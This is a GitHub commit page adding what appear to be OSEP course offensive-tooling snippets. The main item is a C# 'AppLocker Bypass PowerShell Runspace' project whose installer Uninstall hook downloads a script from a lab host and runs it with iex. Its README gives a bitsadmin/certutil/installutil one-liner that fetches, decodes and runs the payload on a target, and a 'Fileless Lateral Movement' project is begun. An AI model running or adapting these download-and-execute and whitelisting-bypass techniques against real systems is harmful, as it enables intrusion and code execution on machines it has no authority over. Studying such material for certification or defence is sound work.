Skip to content

Commit

Permalink
initial commit
Browse files Browse the repository at this point in the history
  • Loading branch information
chvancooten committed Mar 10, 2021
0 parents commit b1ea18c
Show file tree
Hide file tree
Showing 231 changed files with 3,468 additions and 0 deletions.
Binary file not shown.
Binary file not shown.
6 changes: 6 additions & 0 deletions AppLocker Bypass PowerShell Runspace/App.config
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>AppLocker_Bypass_PowerShell_Runspace</RootNamespace>
<AssemblyName>AppLocker Bypass PowerShell Runspace</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.Core" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<SpecificVersion>False</SpecificVersion>
<HintPath>..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
</Reference>
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU
{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F}
EndGlobalSection
EndGlobal
30 changes: 30 additions & 0 deletions AppLocker Bypass PowerShell Runspace/Program.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Nothing going on in this binary.");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
36 changes: 36 additions & 0 deletions AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
13 changes: 13 additions & 0 deletions AppLocker Bypass PowerShell Runspace/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
# AppLocker Bypass PowerShell Runspace

We can encode this into a text file with `CertUtil`.

```powershell
certutil -encode C:\Path\To\Binary.exe binary-coded.txt
```

We then run the following oneliner on the target to use the combination of Microsoft-signed binaries to effectively bypass AppLocker.

```powershell
cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
```
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>
Binary file not shown.
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
Binary file not shown.
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
// <autogenerated />
using System;
using System.Reflection;
[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
Empty file.
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
edaa310d85385d45fdb6b26137bec7797b76c95f
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.exe.config
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.exe
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\AppLocker Bypass PowerShell Runspace.pdb
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\bin\Release\System.Management.Automation.dll
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csprojAssemblyReference.cache
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csproj.CoreCompileInputs.cache
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.csproj.CopyComplete
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.exe
C:\Users\Anonymous\source\repos\OSEP Code Snippets\AppLocker Bypass PowerShell Runspace\obj\Release\AppLocker Bypass PowerShell Runspace.pdb
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
6 changes: 6 additions & 0 deletions Fileless Lateral Movement/App.config
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>
73 changes: 73 additions & 0 deletions Fileless Lateral Movement/Fileless Lateral Movement.csproj
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>Fileless_Lateral_Movement</RootNamespace>
<AssemblyName>Fileless Lateral Movement</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<DebugSymbols>true</DebugSymbols>
<OutputPath>bin\x64\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<DebugType>full</DebugType>
<PlatformTarget>x64</PlatformTarget>
<LangVersion>7.3</LangVersion>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
<OutputPath>bin\x64\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<Optimize>true</Optimize>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x64</PlatformTarget>
<LangVersion>7.3</LangVersion>
<ErrorReport>prompt</ErrorReport>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
25 changes: 25 additions & 0 deletions Fileless Lateral Movement/Fileless Lateral Movement.sln
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC}
EndGlobalSection
EndGlobal
Loading

0 comments on commit b1ea18c

Please sign in to comment.